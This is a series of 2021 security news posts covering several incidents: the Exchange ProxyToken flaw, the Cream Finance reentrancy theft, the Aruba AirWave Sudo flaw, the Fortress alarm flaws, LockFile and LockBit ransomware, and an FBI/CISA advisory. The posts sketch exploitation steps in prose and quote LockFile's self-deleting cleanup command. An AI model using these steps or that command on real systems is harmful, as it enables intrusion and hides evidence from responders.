Anyway, the experts noticed that in a default configuration of the product, the module DelegatedAuthModule will not be loaded at all for the back-end ECP site.

“In summary, when the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request. Meanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.” continues the analysis.

Experts noticed that in order to trigger the issue, each request to an /ecp page is required to have a ticket known as the “ECP canary”. In the absence of the canary, the request will come back with an HTTP 500. However, the researchers noticed that the 500 error response is accompanied by a valid canary that could be used to issue an unauthenticated request.

proxytoken token

Microsoft has addressed the ProxyToken flaw in July, it has been rated with a CVSS score of 7.5 because it could be exploited by an attacker with an account on the same Exchange server as the victim.

Researchers from Bleeping Computer noticed that some experts already reported exploit attempts that occurred in the last weeks.

Below is a tweet published by security experts Rich Warren from NCC Groug:

Most of the in the wild exploit attempts I have seen for this are from August 10th https://t.co/k9AH80uHw4 pic.twitter.com/oYaE1KB2II

— Rich Warren (@buffaloverflow) August 30, 2021

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ProxyToken)

The post Microsoft Exchange ProxyToken flaw can allow attackers to read your emails appeared first on Security Affairs.

Threat actors stole $29 million worth of crypto assets from Cream Finance

31 August 2021 at 11:53

Crooks have stolen more than $29 million in cryptocurrency assets from Cream Finance, a decentralized finance (DeFi) platform.

Threat actors have stolen more than $29 million in cryptocurrency assets from Cream Finance, a decentralized finance (DeFi) platform.

C.R.E.A.M. Finance is a decentralized lending protocol for individuals, institutions and protocols to access financial services. It promises earnings to users who are passively holding ETH or wBTC.

The security breach was confirmed by the company with a message via Twitter:

C.R.E.A.M. v1 market on Ethereum has suffered an exploit, resulting in a loss of 418,311,571 in AMP and 1,308.09 in ETH, by way of reentrancy on the AMP token contract.

We have stopped the exploit by pausing supply and borrow on AMP. No other markets were affected.

— Cream Finance 🍦 (@CreamdotFinance) August 30, 2021

The blockchain security firm PeckShield first spotted the attack and published a series of Tweets containing evidence of the security breach.

1/4 @CreamFinance was exploited in (one hack tx: https://t.co/JPW7e368qd), leading to the gain of ~$18.8M for the hacker.

— PeckShield Inc. (@peckshield) August 30, 2021

According to Cream Finance, attackers conducted “reentrancy attack” in its “flash loan” feature to steal 418,311,571 in AMP tokens and 1,308.09 in ETH coins.

“The AMP token contract implements ERC77-based ERC1820, which has the _callPreTransferHooks for reentrancy. Thank you @peckshield for assisting with this investigation.” states the DeFi platform.

Reentrancy attacks consist in withdrawing funds repeatedly before the original transaction is approved or declined.

According to PeckShield the attackers exploited a bug in the ERC777 token contract interface implemented by Cream Finance to interact with the Etherium blockchain.

3/4 Specifically, in the example tx, the hacker makes a flashloan of 500 ETH and deposit the funds as collateral. Then the hacker borrows 19M $AMP and makes use of the reentrancy bug to re-borrow 355 ETH inside $AMP token transfer(). Then the hacker self-liquidates the borrow. pic.twitter.com/ryVX2RoxhJ

— PeckShield Inc. (@peckshield) August 30, 2021

DeFi attacks are becoming very profitable for threat actors, according to a recent post published by CipherTrace they totalled 361 million By July 2021 and accounted for 76% of all major hacks in 2021.

“By July 2021, DeFi-related hacks total $361 million, already making up three-quarters of the total hack volume this year—a 2.7x increase from 2020. DeFi-related fraud continues to rise, as well. At the time of this report, DeFi-related fraud accounted for 54% of major crypto fraud volume, whereas last year DeFi-related fraud only made up 3% of the year’s total.” states CipherTrace.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, DeFi)

The post Threat actors stole $29 million worth of crypto assets from Cream Finance appeared first on Security Affairs.

HPE wars customers of Sudo flaw in Aruba AirWave Management Platform

31 August 2021 at 14:48

Hewlett Packard Enterprise (HPE) warns of a vulnerability in Sudo open-source program used in its Aruba AirWave management platform.

Hewlett Packard Enterprise (HPE) is warning of a high-severity privilege escalation vulnerability in Sudo open-source program used within its Aruba AirWave management platform. The Aruba AirWave management platform is a real-time monitoring and security alert platform designed by HPE.

An unprivileged and unauthenticated local attacker could exploit the vulnerability to gain root privileges on a vulnerable host.

“A vulnerability in the command line parameter parsing code of sudo could allow an attacker with access to sudo to execute commands or binaries with root privileges. The main impact of this vulnerability would be as part of a “chained attack” where an attacker has achieved a foothold with lower privileges via another vulnerability and then uses this to escalate privileges.” reads the security advisory.

Experts warn that this flaw could be chained with other vulnerabilities by an attacker with lower privileges to escalate them once obtained access to the target system.

The CVE-2021-3156 was discovered by Qualys researchers in January, it has allowed any local user to gain root privileges on Unix-like operating systems without authentication.

Sudo is one of the most important, powerful, and commonly used utilities that comes as a core command pre-installed on macOS and almost every UNIX or Linux-based operating system.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

The Sudo CVE-2021-3156 vulnerability, dubbed Baron Samedit, is a heap-based buffer overflow that was reported on January 13th and disclosed at the end of January to give the development team the time to address the issue.

HPE confirmed that the flaw affected the AirWave management platform prior to version 8.2.13.0 that was released on June 18, 2021.

HPE also provided a workaround for HPE AirWave customers and pointed out that Aruba is not aware of any attacks in the wild against Aruba products exploiting the above vulnerability.

“To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based  management interfaces for AirWave be restricted to a dedicated  layer 2 segment/VLAN and/or controlled by firewall policies at  layer 3 and above.” concludes the advisory.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-3156)

The post HPE wars customers of Sudo flaw in Aruba AirWave Management Platform appeared first on Security Affairs.

Threat actors can remotely disable Fortress S03 Wi-Fi Home Security System

31 August 2021 at 19:39

Rapid7 researchers discovered two flaws that can be exploited by attackers to remotely disable one of the home security systems offered by Fortress Security Store.

Researchers at cybersecurity firm Rapid7 discovered two vulnerabilities that can be exploited by hackers to remotely disarm the Fortress S03 WiFi Security System manufactured by Fortress Security Store.

Fortress S03 Wi-Fi Home Security System

The Fortress S03 Wi-Fi Home Security System allows users to build their own alarm system to secure their homes and small businesses. It supports security cameras, window and door sensors, glass break sensors, vibration and motion sensors, and smoke/gas/water alarms.

The company provides its systems to thousands of clients and continued customers.

The flaws, tracked as CVE-2021-39276 (CVSS score: 5.3) and CVE-2021-39277 (CVSS score: 5.7), can be abused by a threat actor to gain unauthorized access to the system.

Both issues were reported by cybersecurity firm Rapid7 in May 2021.

“Rapid7 researcher Arvind Vishwakarma discovered multiple vulnerabilities in the Fortress S03 WiFi Home Security System. These vulnerabilities could result in unauthorized access to control or modify system behavior, and access to unencrypted information in storage or in transit.” reads the post published by Rapid7.

The CVE-2021-39276 flaw is an insecure cloud API deployment, while the CVE-2021-39277 issue can allow anyone within Radio Frequency (RF) signal range to capture and replay RF signals to alter systems behavior.

“CVE-2021-39276 describes an instance of CWE-287; specifically, it describes an insecure cloud API deployment which allows unauthenticated users to trivially learn a secret that can then be used to alter the system’s functionality remotely.” continues the post. “It has an initial CVSS score of 5.3 (medium). CVE-2021-39277 describes an instance of CWE-294, a vulnerability where anyone within Radio Frequency (RF) signal range could capture and replay RF signals to alter systems behavior, and has an initial CVSS score of 5.7.”

An attacker could exploit the CVE-2021-39276 by knowing the targeted user’s email address and use it to query the API and obtain the IMEI number associated with the security system. Once the attacker has obtained the IMEI, he can send unauthenticated POST requests to change the behavior the system, including disarming it.

The CVE-2021-39277 flaw can be exploited to launch a radio frequency (RF) signal replay attack because communications between different components of the home security system are not properly protected.

An attacker in the radio range of the target can capture command-and-control signals over the air, such as a command to disarm the system, and then replay them at a later time.

Below the Disclosure Timeline for the two flaws:

  • May, 2021: Issues discovered by Arvind Vishwakarma of Rapid7
  • Thu, May 13, 2021: Initial contact to Fortress support email
  • Thu, May 13, 2021: Ticket #200781 created
  • Mon, May 24, 2021: Ticket #200781 closed by Fortress
  • Wed, Aug 18, 2021: Rapid7 created a follow up ticket, #203001, with vulnerability details and a reiteration of intent to publish
  • Tue, Aug 31, 2021: Published disclosure

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Fortress)

The post Threat actors can remotely disable Fortress S03 Wi-Fi Home Security System appeared first on Security Affairs.

LockFile Ransomware uses a new intermittent encryption technique

31 August 2021 at 22:31

Recently emerged LockFile ransomware family LockFile leverages a novel technique called intermittent encryption to speed up encryption.

LockFile ransomware gang started its operations last month, recently it was spotted targeting Microsoft Exchange servers using the recently disclosed ProxyShell vulnerabilities. The popular security expert Kevin Beaumont was one of the first researchers to report that the LockFile operators are using the Microsoft Exchange ProxyShell and the Windows PetitPotam vulnerabilities to take over Windows domains.

Sophos researchers discovered that the group is now leveraging a new technique called “intermittent encryption” to speed up the encryption process.

The operators behind LockFile ransomware encrypt alternate blocks of 16 bytes in a document to evade detection. This is the first time that Sophos experts have seen this approach used in a ransomware attack.

“Partial encryption is generally used by ransomware operators to speed up the encryption process and we’ve seen BlackMatter, DarkSide and LockBit 2.0 ransomware implement this technique,” said Mark Loman, director of engineering at Sophos. “What sets LockFile apart is that, unlike the others, it doesn’t encrypt the first few blocks. Instead, LockFile encrypts every other 16 bytes of a document. This means that a file such as a text document remains partially readable and looks statistically like the original. This trick can be successful against ransomware detection software that relies on inspecting content using statistical analysis to detect encryption.”

Sophos experts spotted the new technique while analyzing a LockFile sample (SHA-256 hash: bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce) that was uploaded to VirusTotal on August 22, 2021.

The ransomware leverages Windows Management Interface (WMI) to terminate critical processes associated with virtualization software and databases to remove any locks that could interfere with file encryption.

The ransom note is an HTML Application (HTA) file (e.g., ‘LOCKFILE-README-[hostname]-[id].hta’) that is dropped in the root of the drive. The HTA ransom note used by LockFile closely resembles the one used by LockBit 2.0 ransomware:

lockfile fig11

The victims of the Lockfile ransomware gang are in the manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors.

The ransom note used by the Lockfile gang is similar to the one used by the LockBit ransomware operators and reference the Conti gang in the email address used ([email protected][.]com).

Once encrypted the files, the ransomware will append the .lockfile extension to the encrypted file’s names and deletes ransomware binary from the system.

“Once it has encrypted all the documents on the machine, the ransomware deletes itself with the following command:

cmd /c ping 127.0.0.1 -n 5 && del “C:\Users\Mark\Desktop\LockFile.exe” && exit

The PING command sends five ICMP messages to the localhost (i.e., itself), and this is simply intended as a five second sleep to allow the ransomware process to close itself before executing the DEL command to delete the ransomware binary.” states Sophos. “This means that after the ransomware attack, there is no ransomware binary for incident responders or antivirus software to find or clean up.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Lockfile ransomware)

The post LockFile Ransomware uses a new intermittent encryption technique appeared first on Security Affairs.

LockBit ransomware operators leak 200GB of data belonging to Bangkok Airways

1 September 2021 at 11:03

LockBit ransomware operators have breached Bangkok Airways, the airline confirmed it was the victim and discloses a data breach impacting its passengers.

Bangkok Airways, a regional airline based in Bangkok, discloses a data breach as a result of a ransomware attack orchestrated by the LockBit ransomware operators.

The ransomware gang had posted a message on their leak site claiming to have breached the airline and threatening to leak stolen data if the company will not pay the ransom.

LockBit claims to have stolen more than 200GB of data belonging to the company, the message published by the gang on its leak site highlights the poor security implemented by the company.

“We Have More Files (Extra +200GB) To Show. And Many More Things To Say… They said : “We protect our customers privacy” But with “[email protected]” for all systems and domain admins”

Bangkok airways LockBit ransomware

The company discovered the security breach on August 23 and immediately launched an investigation, with the assistance of a cybersecurity team, to determine the extent of the incident. Bangkok Airways also reported the breach to the authorities.

“An initial investigation of the incident appeared to confirm that some of the personal data may have been accessed which are, passenger name, family name, nationality, gender, phone number, email, address, contact information, passport information, historical travel information, partial credit card information, and special meal information. The company however, confirms that the incident did not affect the company’s operational or aeronautical security systems.” reads a press release published by the company. “This incident has been reported to the Royal Thai police as well as providing notification to the relevant authorities. For primary prevention measures, the company highly recommends passengers to contact their bank or credit card provider and follow their advice and change any compromised passwords as soon as possible.”

The airline company said that the security breach did not impact Bangkok Airways’ operational or aeronautical security systems, but attackers may have had access to personal data belonging to passengers.

Exposed data include passenger full names, nationality, gender, phone numbers, email and physical addresses, passport info, historical travel data, partial credit card info, and special meal details.

Bangkok Airways warns its customers to be vigilant and be aware of any suspicious or unsolicited calls and/or emails, as the attacker may attempt to carry out malicious activities such as phishing attacks. 

LockBit is the same ransomware gang that stole 6TB of data from Accenture and demanded a $50 million ransom to stop the leak of the data.

The gang also hit another airline company, on August 23 LockBit operators published data stolen from Ethiopian airline on its leak site.

Bleeping Computer, who contacted the threat actors, reported that they claim to have access to info that could allow them to target Accenture’s customers.

“Although the hackers declined to name a victim, they claimed to have compromised an airport that was using Accenture software and encrypted its systems.” reported Bleeping Computer.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Bangkok Airways )

The post LockBit ransomware operators leak 200GB of data belonging to Bangkok Airways appeared first on Security Affairs.

Watch out, ransomware attack risk increases on holidays and weekends, FBI and CISA

1 September 2021 at 13:27

The FBI and CISA issued a joint cybersecurity advisory to warn organizations to remain vigilant against ransomware attacks during weekends or holidays.

The FBI and CISA warn organizations to keep high their defenses against ransomware attacks during weekends or holidays.

The government agencies have observed an increase in ransomware attacks occurring on holidays and weekends, the choice of these period is motivated by the lower level of defense due to the reduced presence of the personnel.

“Today, the Federal Bureau of Investigation (FBI) and CISA released a Joint Cybersecurity Advisory (CSA) to urge organizations to ensure they protect themselves against ransomware attacks during holidays and weekends—when offices are normally closed.” reads the advisory published by CISA. “Although FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday, malicious cyber actors have launched serious ransomware attacks during other holidays and weekends in 2021.”

Clearly, the FBI and CISA focus on attacks against organizations in the United States, they proposed as case studies the attacks against Colonial Pipeline, JBS, and Kaseya.

The agencies shared a few examples of attacks orchestrated by ransomware gangs ahead of holidays and weekends:

  • In May 2021, leading into Mother’s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim’s network, they deployed ransomware to encrypt victim data and—as a secondary form of extortion—exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.
  • In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.
  • In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations—including multiple managed service providers and their customers.

The ransomware families that have been most active over the last month are Conti, PYSA, LockBit, RansomEXX/Defray777, Zeppelin, Crysis/Dharma/Phobos.

Most of the attacks leverage phishing and brute-forcing unsecured remote desktop protocol (RDP) endpoints and initial attack vectors to compromise the networks of the organizations and deploy the ransomware.

The FBI and CISA recommend organizations conduct threat hunting on their networks aimed at searching for any signs of threat actor activity to prevent attacks before they occur or to minimize the impact of successful attacks.

“Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems.” reads the joint alert.

Experts suggest focusing on:

  • Understand the IT environment’s routine activity and architecture by establishing a baseline;
  • Review data logs;
  • Employ intrusion prevention systems and automated security alerting systems;
  • Deploy honeytokens.

Some Indicators of suspicious activity that organizations should look for include:

  • Unusual inbound and outbound network traffic,
  • Compromise of administrator privileges or escalation of the permissions on an account,
  • Theft of login and password credentials,
  • Substantial increase in database read volume,
  • Geographical irregularities in access and log in patterns,
  • Attempted user activity during anomalous logon times, 
  • Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and
  • Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.

CISA pointed out that it provides a range cyber hygiene services for free, such as vulnerability scanning and ransomware readiness assessments to help organizations determine their surface of attack and reduce it..

Both agencies also encourage victims of ransomware attacks to share forensic artifacts as part of their incident report, including: 

  • Recovered executable file(s),
  • Live memory (RAM) capture,
  • Images of infected systems,
  • Malware samples, and
  • Ransom note.

The Joint report provides the following recommendations to the organizations:

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Watch out, ransomware attack risk increases on holidays and weekends, FBI and CISA appeared first on Security Affairs.

❌